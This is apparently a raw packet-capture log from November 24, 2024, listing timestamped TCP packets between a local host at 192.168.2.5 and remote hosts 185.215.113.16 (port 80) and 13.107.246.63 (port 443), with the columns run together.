                                                                                                                                                                                                Nov 24, 2024 03:04:33.012223005 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.019346952 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.081705093 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.085251093 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.085294962 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.117089987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.117197990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.117346048 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.117630005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.117697001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.118240118 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.131731987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.131782055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.131953001 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.132353067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.132440090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.132949114 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.133539915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.133657932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.133738041 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.134707928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.134823084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.134963989 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.135935068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.136056900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.136274099 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.137271881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.137365103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.137599945 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.138133049 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.138304949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.138389111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.138428926 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.138892889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.139487028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.139590025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.139775038 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.140700102 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.140793085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.140928030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.141891003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.141982079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.143148899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.143207073 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.143219948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.143927097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.144284010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.144376040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.145616055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.145636082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.145663023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.145701885 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.146727085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.146799088 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.147893906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.147947073 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.147989035 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.149072886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.149151087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.149195910 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.150266886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.150368929 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.150413990 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.151449919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.151544094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.152646065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.152698994 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.152776957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.153853893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.153897047 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.153956890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.155046940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.155174971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.155221939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.156250954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.156368971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.156555891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.156671047 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.157435894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.157548904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.158629894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.158662081 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.158731937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.159843922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.159943104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.159984112 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.161026955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.161127090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.161665916 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.161725998 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.162211895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.162329912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.162425041 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.163465023 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.163535118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.164433956 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.164611101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.164721966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.165800095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.165853024 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.165913105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.167012930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.167114973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.167170048 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.168211937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.168334961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.168848991 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.169414997 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.169516087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.170597076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.170650005 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.170701027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.171035051 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.171804905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.171899080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.171936989 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.172987938 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.173101902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.173163891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.174232960 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.174302101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.174623966 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.175395012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.175494909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.175714016 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.175793886 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.176562071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.176713943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.176971912 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.177156925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.177768946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.177886963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.177926064 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.178972006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.179073095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.179694891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.180159092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.180278063 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.180454969 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.181004047 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.181365967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.181411982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.181514978 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.182075024 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.182548046 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.182609081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.182670116 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.183533907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.183760881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.183861971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.183907986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.184994936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.185007095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.185045958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.186265945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.186278105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.186316967 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.187347889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.187391996 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.187721014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.188534975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.188548088 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.188582897 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.189785957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.189829111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.189867020 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.190929890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.191040039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.191076040 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.192091942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.202433109 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.207029104 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.207041025 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.233706951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.273639917 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.280518055 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.280543089 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.292900085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.293009996 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.293145895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.293482065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.293725014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.293781996 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.293812037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.294949055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.295013905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.295031071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.296091080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.296175957 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.329273939 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.329866886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.329941988 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.330440044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.330523014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.330615044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.331670046 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.331813097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.331850052 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.331870079 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.332598925 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.332636118 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.332871914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.332977057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.333026886 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.334019899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.334140062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.334204912 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.334937096 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.335252047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.335360050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.335907936 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.336435080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.336540937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.336600065 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.337603092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.337716103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.337764025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.338824987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.338917017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.338963985 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.339992046 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.340128899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.340173006 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.341211081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.341340065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.341617107 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.342394114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.342508078 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.342556953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.343597889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.343713045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.343759060 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.344801903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.344918013 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.344961882 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.346018076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.346096039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.346134901 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.347177982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.347285986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.347596884 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.348371983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.348473072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.348520041 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.349564075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.349670887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.349710941 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.350761890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.350883961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.350930929 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.351963043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.352089882 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.352137089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.353177071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.353297949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.353579044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.354351997 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.354413986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.354459047 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.355554104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.355664968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.355710983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.356744051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.356864929 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.356913090 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.357940912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.358062983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.358109951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.359138012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.359253883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.359308958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.360347033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.360464096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.360524893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.361526966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.361643076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.361690044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.362776041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.362845898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.362890005 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.363938093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.364061117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.364101887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.365119934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.365230083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.365272999 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.366328955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.366451025 CET8049729185.215.113.16192.168.2.5
